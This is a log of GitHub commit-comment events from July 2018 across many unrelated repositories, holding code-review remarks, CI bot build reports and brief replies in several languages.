{"id":"8007960923","type":"CommitCommentEvent","actor":{"login":"WangNianyi2001"},"repo":{"name":"WangNianyi2001/Nianyi-s-JavaScript-Library"},"payload":{"comment":{"id":29809210,"position":44,"line":44,"path":"Nianyi.js","commit_id":"e952b0f8ac424f1bd9442e0c89172879a0a60a35","created_at":"2018-07-24T05:47:31Z","updated_at":"2018-07-24T05:47:31Z","author_association":"OWNER","body":"See if the current objects have been compared beforehand, if so, they're equal.\r\nUsing this stack we can prevent infinite recursive calls brought by self-references."}},"created_at":"2018-07-24T05:47:31Z"}
{"id":"8007961754","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"energy-plus/EnergyPlus"},"payload":{"comment":{"id":29809214,"position":null,"line":null,"path":null,"commit_id":"fc1b41bea3db8faffec69bf84e79a557a8c8127a","created_at":"2018-07-24T05:47:48Z","updated_at":"2018-07-24T05:47:48Z","author_association":"NONE","body":"CoilHackathonBranch1 (energy-plus) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fc1b41bea3db8faffec69bf84e79a557a8c8127a-PR6846-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-24T05:47:48Z"}
{"id":"8007961885","type":"CommitCommentEvent","actor":{"login":"AndrewJCallow"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29809216,"position":54,"line":54,"path":"contracts/SplitterUtility.sol","commit_id":"19438b2ecb97cb416709db96ebb199f6bcde1796","created_at":"2018-07-24T05:47:51Z","updated_at":"2018-07-24T05:47:51Z","author_association":"OWNER","body":"But I'm keeping tracking of the value given away by the beneficiary (which could be anyone, a previous recipient for instance) so it must come off their balance, no? e.g. give 2 away, give 3 away, now the donator is down 5?"}},"created_at":"2018-07-24T05:47:51Z"}
{"id":"8007962599","type":"CommitCommentEvent","actor":{"login":"WangNianyi2001"},"repo":{"name":"WangNianyi2001/Nianyi-s-JavaScript-Library"},"payload":{"comment":{"id":29809218,"position":39,"line":39,"path":"Nianyi.js","commit_id":"e952b0f8ac424f1bd9442e0c89172879a0a60a35","created_at":"2018-07-24T05:48:07Z","updated_at":"2018-07-24T05:48:07Z","author_association":"OWNER","body":"Now we only have general objects left."}},"created_at":"2018-07-24T05:48:07Z"}
{"id":"8007964917","type":"CommitCommentEvent","actor":{"login":"WangNianyi2001"},"repo":{"name":"WangNianyi2001/Nianyi-s-JavaScript-Library"},"payload":{"comment":{"id":29809220,"position":49,"line":49,"path":"Nianyi.js","commit_id":"e952b0f8ac424f1bd9442e0c89172879a0a60a35","created_at":"2018-07-24T05:48:58Z","updated_at":"2018-07-24T05:48:58Z","author_association":"OWNER","body":"Getting the sorted key list of two objects."}},"created_at":"2018-07-24T05:48:58Z"}
{"id":"8007965307","type":"CommitCommentEvent","actor":{"login":"TomByrne"},"repo":{"name":"openfl/lime"},"payload":{"comment":{"id":29809222,"position":null,"line":null,"path":null,"commit_id":"07c37eb81267e21835a41c5bf089f706c1f1fae3","created_at":"2018-07-24T05:49:07Z","updated_at":"2018-07-24T05:49:07Z","author_association":"NONE","body":"Hi Joshua, would you be able to publish a new version with this change?"}},"created_at":"2018-07-24T05:49:07Z"}
{"id":"8007965429","type":"CommitCommentEvent","actor":{"login":"therealaldo"},"repo":{"name":"therealaldo/templates"},"payload":{"comment":{"id":29809223,"position":null,"line":null,"path":null,"commit_id":"0b335c4cbd0f0b1bdb9454c9bd05100c743256cb","created_at":"2018-07-24T05:49:09Z","updated_at":"2018-07-24T05:49:09Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Update Trello docs w/ grooming session info](https://trello.com/c/aISYL77O/51-update-trello-docs-w-grooming-session-info)"}},"created_at":"2018-07-24T05:49:09Z"}
{"id":"8007967009","type":"CommitCommentEvent","actor":{"login":"AndrewJCallow"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29809225,"position":26,"line":26,"path":"contracts/SplitterUtility.sol","commit_id":"19438b2ecb97cb416709db96ebb199f6bcde1796","created_at":"2018-07-24T05:49:43Z","updated_at":"2018-07-24T05:49:43Z","author_association":"OWNER","body":"The accounting's supposed to be in the runningBalances. This is just if the client wants to run through the splits. So I should be disseminating a flattened SplitInfo into one or more events?"}},"created_at":"2018-07-24T05:49:43Z"}
{"id":"8007969116","type":"CommitCommentEvent","actor":{"login":"WangNianyi2001"},"repo":{"name":"WangNianyi2001/Nianyi-s-JavaScript-Library"},"payload":{"comment":{"id":29809230,"position":59,"line":59,"path":"Nianyi.js","commit_id":"e952b0f8ac424f1bd9442e0c89172879a0a60a35","created_at":"2018-07-24T05:50:27Z","updated_at":"2018-07-24T05:50:27Z","author_association":"OWNER","body":"For each key in `a`, see if the corresponding key in `b` is the same, if not, rule them out.\r\nThen we compare their values by recursively calling `_equal(a, b)`."}},"created_at":"2018-07-24T05:50:27Z"}
{"id":"8007972270","type":"CommitCommentEvent","actor":{"login":"WangNianyi2001"},"repo":{"name":"WangNianyi2001/Nianyi-s-JavaScript-Library"},"payload":{"comment":{"id":29809234,"position":16,"line":12,"path":"Nianyi.js","commit_id":"09533c2a166244611f4e712e2aed2c909b9b4d6b","created_at":"2018-07-24T05:51:34Z","updated_at":"2018-07-24T05:51:34Z","author_association":"OWNER","body":"Renaming inner functions with an underline at the front."}},"created_at":"2018-07-24T05:51:34Z"}
{"id":"8007974528","type":"CommitCommentEvent","actor":{"login":"WangNianyi2001"},"repo":{"name":"WangNianyi2001/Nianyi-s-JavaScript-Library"},"payload":{"comment":{"id":29809238,"position":20,"line":15,"path":"Nianyi.js","commit_id":"09533c2a166244611f4e712e2aed2c909b9b4d6b","created_at":"2018-07-24T05:52:23Z","updated_at":"2018-07-24T05:52:23Z","author_association":"OWNER","body":"Calling `Object.prototype.toString()` on `undefined` will also lead to an type error."}},"created_at":"2018-07-24T05:52:23Z"}
{"id":"8007977181","type":"CommitCommentEvent","actor":{"login":"WangNianyi2001"},"repo":{"name":"WangNianyi2001/Nianyi-s-JavaScript-Library"},"payload":{"comment":{"id":29809244,"position":49,"line":47,"path":"Nianyi.js","commit_id":"09533c2a166244611f4e712e2aed2c909b9b4d6b","created_at":"2018-07-24T05:53:14Z","updated_at":"2018-07-24T05:53:14Z","author_association":"OWNER","body":"`a_descriptors` & `b_descriptors` have been only used once, they can be inlined."}},"created_at":"2018-07-24T05:53:14Z"}
{"id":"8007978722","type":"CommitCommentEvent","actor":{"login":"AndrewJCallow"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29809249,"position":12,"line":12,"path":"test/utilitysplittertests.js","commit_id":"5662a8fe1a415192acb4d5b9050eaceb1e6d1372","created_at":"2018-07-24T05:53:45Z","updated_at":"2018-07-24T05:53:45Z","author_association":"OWNER","body":"no, i hadn't much more skillful!"}},"created_at":"2018-07-24T05:53:45Z"}
{"id":"8007981071","type":"CommitCommentEvent","actor":{"login":"liangfengchao"},"repo":{"name":"ChaiYe/XiaoMiMall"},"payload":{"comment":{"id":29809252,"position":null,"line":null,"path":null,"commit_id":"651efbfdd56e70fc79405dc901285cfd29687275","created_at":"2018-07-24T05:54:33Z","updated_at":"2018-07-24T05:54:33Z","author_association":"NONE","body":"aaaa"}},"created_at":"2018-07-24T05:54:33Z"}
{"id":"8007981461","type":"CommitCommentEvent","actor":{"login":"weinzierl-florian"},"repo":{"name":"IF11I/backend"},"payload":{"comment":{"id":29809253,"position":2,"line":2,"path":"public/index.php","commit_id":"6bc78db25ad323b89a06eb5b7e24c3c16b388824","created_at":"2018-07-24T05:54:41Z","updated_at":"2018-07-24T05:54:41Z","author_association":"MEMBER","body":"remove unused code"}},"created_at":"2018-07-24T05:54:41Z"}
{"id":"8007982140","type":"CommitCommentEvent","actor":{"login":"weinzierl-florian"},"repo":{"name":"IF11I/backend"},"payload":{"comment":{"id":29809254,"position":7,"line":7,"path":"public/index.php","commit_id":"6bc78db25ad323b89a06eb5b7e24c3c16b388824","created_at":"2018-07-24T05:54:55Z","updated_at":"2018-07-24T05:54:55Z","author_association":"MEMBER","body":"removed unused code"}},"created_at":"2018-07-24T05:54:55Z"}
{"id":"8007983094","type":"CommitCommentEvent","actor":{"login":"lingceng"},"repo":{"name":"VicoErv/instagram-private-api"},"payload":{"comment":{"id":29809255,"position":35,"line":28,"path":"README.md","commit_id":"3b2a56c966339329163ce47c74dc762671433785","created_at":"2018-07-24T05:55:14Z","updated_at":"2018-07-24T05:55:14Z","author_association":"NONE","body":"The folder name should be underscore style in Ruby, such as ig_api/account.rb"}},"created_at":"2018-07-24T05:55:14Z"}
{"id":"8007984230","type":"CommitCommentEvent","actor":{"login":"weinzierl-florian"},"repo":{"name":"IF11I/backend"},"payload":{"comment":{"id":29809283,"position":6,"line":6,"path":"src/Entities/exampleEntity.php","commit_id":"6bc78db25ad323b89a06eb5b7e24c3c16b388824","created_at":"2018-07-24T05:55:37Z","updated_at":"2018-07-24T05:55:37Z","author_association":"MEMBER","body":"Comment doesn't matches file intention"}},"created_at":"2018-07-24T05:55:37Z"}
{"id":"8007988211","type":"CommitCommentEvent","actor":{"login":"WangNianyi2001"},"repo":{"name":"WangNianyi2001/Nianyi-s-JavaScript-Library"},"payload":{"comment":{"id":29809307,"position":97,"line":108,"path":"Nianyi.js","commit_id":"09533c2a166244611f4e712e2aed2c909b9b4d6b","created_at":"2018-07-24T05:57:00Z","updated_at":"2018-07-24T05:57:00Z","author_association":"OWNER","body":"Implementing a TDD helper.\r\nThis function receives a single object parameter containing the name of the test & the actual test cases.\r\nIt will iterate each test cases, execute the function stored in the current `Nianyi` object with the arguments provided by the case passing into, and compare the output given by the function at the end with the excepted output.\r\nThe final result will be logged to console, wrong results will be highlighted."}},"created_at":"2018-07-24T05:57:00Z"}
{"id":"8007990060","type":"CommitCommentEvent","actor":{"login":"WangNianyi2001"},"repo":{"name":"WangNianyi2001/Nianyi-s-JavaScript-Library"},"payload":{"comment":{"id":29809310,"position":112,"line":123,"path":"Nianyi.js","commit_id":"09533c2a166244611f4e712e2aed2c909b9b4d6b","created_at":"2018-07-24T05:57:39Z","updated_at":"2018-07-24T05:57:39Z","author_association":"OWNER","body":"Basically hard & soft mixin's."}},"created_at":"2018-07-24T05:57:39Z"}
{"id":"8007990897","type":"CommitCommentEvent","actor":{"login":"WangNianyi2001"},"repo":{"name":"WangNianyi2001/Nianyi-s-JavaScript-Library"},"payload":{"comment":{"id":29809311,"position":120,"line":131,"path":"Nianyi.js","commit_id":"09533c2a166244611f4e712e2aed2c909b9b4d6b","created_at":"2018-07-24T05:57:56Z","updated_at":"2018-07-24T05:57:56Z","author_association":"OWNER","body":"Binding static functions"}},"created_at":"2018-07-24T05:57:56Z"}
{"id":"8007992671","type":"CommitCommentEvent","actor":{"login":"WangNianyi2001"},"repo":{"name":"WangNianyi2001/Nianyi-s-JavaScript-Library"},"payload":{"comment":{"id":29809315,"position":124,"line":135,"path":"Nianyi.js","commit_id":"09533c2a166244611f4e712e2aed2c909b9b4d6b","created_at":"2018-07-24T05:58:33Z","updated_at":"2018-07-24T05:58:33Z","author_association":"OWNER","body":"An ID generator for `Nianyi.prototype.performTest(sheet)` if there is no `name` passed."}},"created_at":"2018-07-24T05:58:33Z"}
{"id":"8007992744","type":"CommitCommentEvent","actor":{"login":"VicoErv"},"repo":{"name":"VicoErv/instagram-private-api"},"payload":{"comment":{"id":29809316,"position":35,"line":28,"path":"README.md","commit_id":"3b2a56c966339329163ce47c74dc762671433785","created_at":"2018-07-24T05:58:34Z","updated_at":"2018-07-24T05:58:34Z","author_association":"OWNER","body":"will refactor"}},"created_at":"2018-07-24T05:58:34Z"}
{"id":"8007993133","type":"CommitCommentEvent","actor":{"login":"k3yavi"},"repo":{"name":"10XGenomics/rust-boomphf"},"payload":{"comment":{"id":29809318,"position":213,"line":515,"path":"src/lib.rs","commit_id":"21f76369347f3b36bca48f559f8f94e735205d75","created_at":"2018-07-24T05:58:42Z","updated_at":"2018-07-24T05:58:42Z","author_association":"COLLABORATOR","body":"This could potentially be problematic, since num_windows might be different than `node.len()`, since `node.len()` returns the number of bases in the sequences instead what we wan't is the number of kmers in node.\r\nI guess `ExactSizeIterator` trait has to be implemented but length of Node in `rust-debruijn` has different definition which can potentially break things."}},"created_at":"2018-07-24T05:58:42Z"}
{"id":"8007995487","type":"CommitCommentEvent","actor":{"login":"bbatsov"},"repo":{"name":"bbatsov/projectile"},"payload":{"comment":{"id":29809320,"position":null,"line":null,"path":null,"commit_id":"bc5a96cefb7a76361df17a0b8262152bfde220b5","created_at":"2018-07-24T05:59:31Z","updated_at":"2018-07-24T05:59:31Z","author_association":"OWNER","body":"Maybe I should just remove the default binding completely and leave it to users to decide what to use. This also highlights how common keybinding conflicts between minor modes are (so far people pointed to 3 modes, besides Projectile that are using this keybinding :D)"}},"created_at":"2018-07-24T05:59:31Z"}
{"id":"8007996159","type":"CommitCommentEvent","actor":{"login":"WangNianyi2001"},"repo":{"name":"WangNianyi2001/Nianyi-s-JavaScript-Library"},"payload":{"comment":{"id":29809321,"position":46,"line":45,"path":"index.js","commit_id":"09533c2a166244611f4e712e2aed2c909b9b4d6b","created_at":"2018-07-24T05:59:43Z","updated_at":"2018-07-24T05:59:43Z","author_association":"OWNER","body":"Performing a real test on `Nianyi.equal(a, b)`.\r\nBut technically saying, it is really testing one by itself, `_equal(a, b)` is used in `Nianyi.prototype.perforrmTest(sheet)`."}},"created_at":"2018-07-24T05:59:43Z"}
{"id":"8007997096","type":"CommitCommentEvent","actor":{"login":"agung99"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29809324,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T06:00:03Z","updated_at":"2018-07-24T06:00:03Z","author_association":"NONE","body":"nice project"}},"created_at":"2018-07-24T06:00:03Z"}
{"id":"8007999177","type":"CommitCommentEvent","actor":{"login":"sonimanish78"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29809338,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T06:00:38Z","updated_at":"2018-07-24T06:00:38Z","author_association":"NONE","body":"Great\n\n\nOn Tue 24 Jul, 2018, 6:21 AM TranDoQuocHuy, <notifications@github.com>\nwrote:\n\n> Nice\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/iride2020/iRide-Token/commit/8f810b3700a24de0ee4f945ef84be7b2f1605610#commitcomment-29807697>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AimIEsCMBPDq1Kp81PPsawDRAeWdETwWks5uJm-egaJpZM4VaEAl>\n> .\n>\n"}},"created_at":"2018-07-24T06:00:38Z"}
{"id":"8008001838","type":"CommitCommentEvent","actor":{"login":"hhdang6637"},"repo":{"name":"hhdang6637/embedded_linux_skeleton"},"payload":{"comment":{"id":29809347,"position":null,"line":null,"path":null,"commit_id":"54e699e91dbe0ceb5e746657fd1101dafe0e06ec","created_at":"2018-07-24T06:01:29Z","updated_at":"2018-07-24T06:01:29Z","author_association":"OWNER","body":"@hvloi , @nguyenhien1994 , @tranconghau , @cristianly , @quoctri1 \r\n\r\nJust share with you about IPC mechanism "}},"created_at":"2018-07-24T06:01:29Z"}
{"id":"8008012981","type":"CommitCommentEvent","actor":{"login":"garvitverma"},"repo":{"name":"mbrainerd/tk-config-default2"},"payload":{"comment":{"id":29809370,"position":63,"line":91,"path":"hooks/tk-multi-publish2/ingest/collector.py","commit_id":"526890fd70a019fc8364fe200ce20b5b98b15c02","created_at":"2018-07-24T06:05:10Z","updated_at":"2018-07-24T06:05:10Z","author_association":"COLLABORATOR","body":"We need to try resolving the work_path_template, first using the full path, and if that doesn't map to any template then we have to try parsing just the file name, the filename is a fallback only for non DDNA shows."}},"created_at":"2018-07-24T06:05:10Z"}
{"id":"8008014044","type":"CommitCommentEvent","actor":{"login":"WangNianyi2001"},"repo":{"name":"WangNianyi2001/Nianyi-s-JavaScript-Library"},"payload":{"comment":{"id":29809372,"position":7,"line":16,"path":"Nianyi.js","commit_id":"bfa4b4ff51cea8f3f22323de54a378ce66a5eb08","created_at":"2018-07-24T06:05:31Z","updated_at":"2018-07-24T06:05:31Z","author_association":"OWNER","body":"I forgot the case when `a` & `b` are the different value in these two types."}},"created_at":"2018-07-24T06:05:31Z"}
{"id":"8008016693","type":"CommitCommentEvent","actor":{"login":"kirilkirkov"},"repo":{"name":"kirilkirkov/Shopping-Cart-Solution-CodeIgniter"},"payload":{"comment":{"id":29809378,"position":null,"line":null,"path":null,"commit_id":"552cbc73fdd498db34bd96aa55ae03820d0b2255","created_at":"2018-07-24T06:06:25Z","updated_at":"2018-07-24T06:06:25Z","author_association":"OWNER","body":"@surepeps link - admin/orders?settings, there are options for payment and you can activate it"}},"created_at":"2018-07-24T06:06:25Z"}
{"id":"8008017175","type":"CommitCommentEvent","actor":{"login":"WangNianyi2001"},"repo":{"name":"WangNianyi2001/Nianyi-s-JavaScript-Library"},"payload":{"comment":{"id":29809379,"position":16,"line":39,"path":"Nianyi.js","commit_id":"bfa4b4ff51cea8f3f22323de54a378ce66a5eb08","created_at":"2018-07-24T06:06:36Z","updated_at":"2018-07-24T06:06:36Z","author_association":"OWNER","body":"We want to compare every property of two objects, it'll fail if two arrays have some extra attributes."}},"created_at":"2018-07-24T06:06:36Z"}
{"id":"8008017726","type":"CommitCommentEvent","actor":{"login":"mibby"},"repo":{"name":"CodeMC/HolographicDisplays"},"payload":{"comment":{"id":29809380,"position":null,"line":null,"path":null,"commit_id":"3a5aa2da3469fedf611e786694e0ca7a76847fef","created_at":"2018-07-24T06:06:47Z","updated_at":"2018-07-24T06:06:47Z","author_association":"NONE","body":"1) As far as I can tell. I downgraded back to @markhughes's build for now.\r\n2) Not keeping any kind of backwards compatibility with plugins that utilize HolographicDisplays? Like HEXT and Chat Bubbles? I don't think they would recompile against your fork since it is unofficial. :("}},"created_at":"2018-07-24T06:06:47Z"}
{"id":"8008023758","type":"CommitCommentEvent","actor":{"login":"goodkov"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":29809389,"position":null,"line":null,"path":null,"commit_id":"7d945b84eca3ab97096fb1b92342cb36568d2075","created_at":"2018-07-24T06:08:40Z","updated_at":"2018-07-24T06:08:40Z","author_association":"NONE","body":"Must i close my test?"}},"created_at":"2018-07-24T06:08:40Z"}
{"id":"8008027858","type":"CommitCommentEvent","actor":{"login":"FredKruse"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":29809396,"position":null,"line":null,"path":null,"commit_id":"ea530f608754e34c7964aff2ca411887b1cf0b66","created_at":"2018-07-24T06:09:59Z","updated_at":"2018-07-24T06:09:59Z","author_association":"CONTRIBUTOR","body":"The removed changes don't work if more than one document is loaded by LO. An other side-effect: If  the user does a change before the back ground iteration is done, the iteration is stopped (the text isn't checked till the end)."}},"created_at":"2018-07-24T06:09:59Z"}
{"id":"8008036455","type":"CommitCommentEvent","actor":{"login":"Owersun"},"repo":{"name":"Owersun/linux-hardkernel"},"payload":{"comment":{"id":29809412,"position":null,"line":null,"path":null,"commit_id":"0925a367c842f7f5599fa528e05379bb1d7bbff9","created_at":"2018-07-24T06:12:42Z","updated_at":"2018-07-24T06:12:42Z","author_association":"OWNER","body":"got it. thx.\r\nvpu_codec is something I'm investigating right now, it has description node in another file that I didn't commit to be enabled.\r\nI've fixed it, thank you for reporting."}},"created_at":"2018-07-24T06:12:42Z"}
{"id":"8008038856","type":"CommitCommentEvent","actor":{"login":"mmcky"},"repo":{"name":"QuantEcon/sphinxcontrib-jupyter"},"payload":{"comment":{"id":29809416,"position":7,"line":8,"path":".travis.yml","commit_id":"938a8c272046ffdcd303f3f655e389e6566cec2a","created_at":"2018-07-24T06:13:29Z","updated_at":"2018-07-24T06:13:29Z","author_association":"CONTRIBUTOR","body":"hey @ArnavSood. Unfortunately to my knowledge `travis-ci` doesn't support windows. https://docs.travis-ci.com/user/multi-os/"}},"created_at":"2018-07-24T06:13:29Z"}
{"id":"8008039886","type":"CommitCommentEvent","actor":{"login":"mmcky"},"repo":{"name":"QuantEcon/sphinxcontrib-jupyter"},"payload":{"comment":{"id":29809417,"position":7,"line":8,"path":".travis.yml","commit_id":"938a8c272046ffdcd303f3f655e389e6566cec2a","created_at":"2018-07-24T06:13:49Z","updated_at":"2018-07-24T06:13:49Z","author_association":"CONTRIBUTOR","body":"I think I will need to setup `AppVeyor`"}},"created_at":"2018-07-24T06:13:49Z"}
{"id":"8008040838","type":"CommitCommentEvent","actor":{"login":"juristr"},"repo":{"name":"nrwl/nx"},"payload":{"comment":{"id":29809419,"position":null,"line":null,"path":null,"commit_id":"3d785c1e283e7c8abf2f5c7a3e8b4897b50851c8","created_at":"2018-07-24T06:14:07Z","updated_at":"2018-07-24T06:14:07Z","author_association":"NONE","body":"Possible this caused an error during \"automatic\" update?\r\n\r\n![image](https://user-images.githubusercontent.com/542458/43120144-74e71b28-8f19-11e8-9715-30f89872b760.png)\r\n"}},"created_at":"2018-07-24T06:14:07Z"}
{"id":"8008041569","type":"CommitCommentEvent","actor":{"login":"yukunsub"},"repo":{"name":"yukunsub/hello-world"},"payload":{"comment":{"id":29809421,"position":null,"line":null,"path":null,"commit_id":"fef9550605aaee6a8e34c1104bc7b6e8f72d33a3","created_at":"2018-07-24T06:14:20Z","updated_at":"2018-07-24T06:14:20Z","author_association":"OWNER","body":"I added hoge."}},"created_at":"2018-07-24T06:14:20Z"}
{"id":"8008046878","type":"CommitCommentEvent","actor":{"login":"pvc1"},"repo":{"name":"TheOfficialFloW/VitaShell"},"payload":{"comment":{"id":29809425,"position":null,"line":null,"path":null,"commit_id":"a14f4e3a4a0f42c2c17f816a17bc97ddcf03c3b9","created_at":"2018-07-24T06:15:54Z","updated_at":"2018-07-24T06:15:54Z","author_association":"CONTRIBUTOR","body":"мда, сомнительные исправления пары десятков строк и первоначальный автор lupus исчез в списке переводчиков, как модно быть исключительно единственным и неповторимым !"}},"created_at":"2018-07-24T06:15:54Z"}
{"id":"8008048454","type":"CommitCommentEvent","actor":{"login":"mutoe"},"repo":{"name":"slimkit/plus-small-screen-client"},"payload":{"comment":{"id":29809431,"position":null,"line":null,"path":null,"commit_id":"1993bf112db63581d839563049359b359e6ea69b","created_at":"2018-07-24T06:16:20Z","updated_at":"2018-07-24T06:16:20Z","author_association":"MEMBER","body":"issue #456 "}},"created_at":"2018-07-24T06:16:20Z"}
{"id":"8008053363","type":"CommitCommentEvent","actor":{"login":"Niveathika92"},"repo":{"name":"wso2/analytics-is"},"payload":{"comment":{"id":29809435,"position":106,"line":106,"path":"features/org.wso2.analytics.is.feature/src/main/siddhi4/IS_widgets/Messages_IS/src/Messages_IS.jsx","commit_id":"fba73f4185ab53a41a09ddf366cf6ab8b85b687c","created_at":"2018-07-24T06:17:45Z","updated_at":"2018-07-24T06:17:45Z","author_association":"MEMBER","body":"Remove console logs"}},"created_at":"2018-07-24T06:17:45Z"}
{"id":"8008054744","type":"CommitCommentEvent","actor":{"login":"ArnavSood"},"repo":{"name":"QuantEcon/sphinxcontrib-jupyter"},"payload":{"comment":{"id":29809441,"position":7,"line":8,"path":".travis.yml","commit_id":"938a8c272046ffdcd303f3f655e389e6566cec2a","created_at":"2018-07-24T06:18:11Z","updated_at":"2018-07-24T06:18:11Z","author_association":"CONTRIBUTOR","body":"You're right- Jesse pointed that out to me soon after I made this commit, so I rolled it back. I think `AppVeyor` would be a good idea, though."}},"created_at":"2018-07-24T06:18:11Z"}
{"id":"8008059224","type":"CommitCommentEvent","actor":{"login":"hhyyrylainen"},"repo":{"name":"Revolutionary-Games/Thrive"},"payload":{"comment":{"id":29809457,"position":null,"line":null,"path":null,"commit_id":"4bd8f020adaaae8277f1089cd9cdf5895637272e","created_at":"2018-07-24T06:19:30Z","updated_at":"2018-07-24T06:19:30Z","author_association":"CONTRIBUTOR","body":"I hope they are not actual tab characters... "}},"created_at":"2018-07-24T06:19:30Z"}
{"id":"8008062814","type":"CommitCommentEvent","actor":{"login":"pureoym"},"repo":{"name":"pureoym/emergency_detector"},"payload":{"comment":{"id":29809459,"position":null,"line":null,"path":null,"commit_id":"bb93c0a16da0bf77baba511a12e910982332eb46","created_at":"2018-07-24T06:20:34Z","updated_at":"2018-07-24T06:20:34Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-24T06:20:34Z"}
{"id":"8008063005","type":"CommitCommentEvent","actor":{"login":"Vizvezdenec"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":29809460,"position":null,"line":null,"path":null,"commit_id":"f7b4b1f502328ee99f73d3756262b84c9af3e6d7","created_at":"2018-07-24T06:20:37Z","updated_at":"2018-07-24T06:20:37Z","author_association":"NONE","body":"looks like it can be tried with [-3;1] now"}},"created_at":"2018-07-24T06:20:37Z"}
{"id":"8008065754","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"energy-plus/EnergyPlus"},"payload":{"comment":{"id":29809467,"position":null,"line":null,"path":null,"commit_id":"fc1b41bea3db8faffec69bf84e79a557a8c8127a","created_at":"2018-07-24T06:21:23Z","updated_at":"2018-07-24T06:21:23Z","author_association":"NONE","body":"CoilHackathonBranch1 (energy-plus) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1699 of 1700 tests passed, 1 test warnings)\n\n\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 657\n * SEGFAULT: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fc1b41bea3db8faffec69bf84e79a557a8c8127a-PR6846-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fc1b41bea3db8faffec69bf84e79a557a8c8127a-PR6846-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fc1b41bea3db8faffec69bf84e79a557a8c8127a-PR6846-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.0%25-green.png)</a>\n"}},"created_at":"2018-07-24T06:21:23Z"}
{"id":"8008066532","type":"CommitCommentEvent","actor":{"login":"mytabworks"},"repo":{"name":"mytabworks/mytabworks.github.io"},"payload":{"comment":{"id":29809472,"position":84,"line":84,"path":"js/dragDevices.js","commit_id":"f304724de2fc401d74f1d4b3ab92769811045611","created_at":"2018-07-24T06:21:37Z","updated_at":"2018-07-24T06:21:37Z","author_association":"OWNER","body":"aawawa"}},"created_at":"2018-07-24T06:21:37Z"}
{"id":"8008066805","type":"CommitCommentEvent","actor":{"login":"fanich37"},"repo":{"name":"nLight/Memory-Game"},"payload":{"comment":{"id":29809473,"position":25,"line":25,"path":"src/components/App/App.jsx","commit_id":"7d6b314e8b7bd46bdf8a8dabdc0e5a35ac0f1301","created_at":"2018-07-24T06:21:41Z","updated_at":"2018-07-24T06:21:41Z","author_association":"NONE","body":"так точно. попробовал вариант с .sort - чисто визуально сортировка не рандомная выходит. элементы из начала массива почти всегда остаются в начале, с конца - в конце. судя по тестам, что нагуглил, там действительно не совсем рандом. но мое решение, это, конечно, как обычно, велосипед... никак не избавлюсь от этого..."}},"created_at":"2018-07-24T06:21:41Z"}
{"id":"8008067766","type":"CommitCommentEvent","actor":{"login":"moham96"},"repo":{"name":"PLi-metas/meta-amlogic"},"payload":{"comment":{"id":29809476,"position":33,"line":57,"path":"conf/machine/include/mecool.inc","commit_id":"f032c1d95676121adafbad860ac76a52679b370f","created_at":"2018-07-24T06:21:58Z","updated_at":"2018-07-24T06:21:58Z","author_association":"CONTRIBUTOR","body":"There is no firmware file for the avl6882(which I assume you meant avl6862 ?).\r\nin the afl1 driver that is included in the coreelec kernel the firmware is in the source code itself and uploaded as such.\r\nlook here :https://github.com/PLi-metas/linux-amlogic/blob/amlogic-3.14-nougat/drivers/amlogic/dvb-avl/avl6862_priv.h\r\nsearch for `AVL_Demod_Patch_DVBSxFw`"}},"created_at":"2018-07-24T06:21:58Z"}
{"id":"8008093065","type":"CommitCommentEvent","actor":{"login":"nicoddemus"},"repo":{"name":"pytest-dev/pytest-xdist"},"payload":{"comment":{"id":29809529,"position":null,"line":null,"path":null,"commit_id":"6ec967a3f25c2b51c8d102ca5d1b68edc7c9c17c","created_at":"2018-07-24T06:29:19Z","updated_at":"2018-07-24T06:29:19Z","author_association":"MEMBER","body":"Sure, thanks again for the contribution!"}},"created_at":"2018-07-24T06:29:19Z"}
{"id":"8008095109","type":"CommitCommentEvent","actor":{"login":"bschi"},"repo":{"name":"tronscan/tronscan-frontend"},"payload":{"comment":{"id":29809533,"position":41,"line":393,"path":"src/translations/de.js","commit_id":"a5a7437c96e4902046122bf5cf28278f41123025","created_at":"2018-07-24T06:29:53Z","updated_at":"2018-07-24T06:29:53Z","author_association":"NONE","body":"Hiermit bestätige ich, dass ich {trxAmount} für **den** Erwerb der Token bezahle, dafür erhalte ich {tokenAmount} Token."}},"created_at":"2018-07-24T06:29:53Z"}
